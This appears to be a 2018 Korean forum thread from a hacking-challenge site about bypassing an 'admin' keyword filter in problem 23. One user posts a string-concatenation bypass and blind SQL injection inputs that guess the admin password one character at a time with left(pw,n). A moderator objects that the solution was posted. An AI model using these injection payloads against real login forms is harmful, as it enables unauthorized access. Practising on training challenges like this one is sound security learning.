FREE
 
 
23번 문제 admin 필터링 우회 검색 결과
NO
568
WRITER
aja
DATE
2018-03-07
COUNT
141
www.google.co.kr/search?biw=360&bih=512&ei=Eu2fWuDBC4ry8AXv_YuYCA&q=admin+필터링+우회&oq=admin+필터링+우회&gs_l=mobile-gws-serp.12...0.0..120158...0....0.0.............mobile-gws-wiz-serp.8eArlnLDrEo%
 
aja
2018-03-07 오후 10:56:27
@두부 참조요!
aja
2018-03-07 오후 10:58:39
admi'+'n'
aja
2018-03-07 오후 11:08:11

1st. attack

id : [어드민 필터링 우회 내용] and left(pw,1)='*'--
pw : 1
OK admin

2nd. attack

id : [어드민 필터링 우회 내용] and left(pw,2)='**'--
pw : 1
OK admin
aja
2018-03-07 오후 11:17:49
cf. choiys.tistory.com
xiphias
2018-03-08 오후 10:12:41
헉. 풀이를 여기에 적으시면 곤란합니다. ㅎㅎ
aja
2018-03-08 오후 11:46:41
너무 디테일 했다면 관리자 권한으로 삭제해주셔도 됩니다. 언제 부터인가 작성자가 올린 글 편집 수정도 안되고 삭제도 않되니 말입니다.
aja
2018-03-08 오후 11:54:11
2번째 댓글 삭제해도 될 듯 합니다.
admin 우회는 구글 검색하다 보면 나오니 3번째 댓글 attak에 대한 건도 삭제해도 되나 어느 정도 삽질을 한 도전자들에게는 눈에 확 들어올 수 있는 내용이긴 할 겁니다.
aja
2018-03-09 오전 12:14:06
이렇게 detail하게 설명해 줘도 SQL Injection 공격 방법에 대해 제대로 이해하지 못한 사람에게는 별다른 소용이 없을 것 같습니다.
xiphias
2018-03-09 오후 12:41:53
게시판 오류 알려주셔서 감사합니다. ^^
이 게시글은 잠시 비밀글로 설정하였다가 삭제하겠습니다.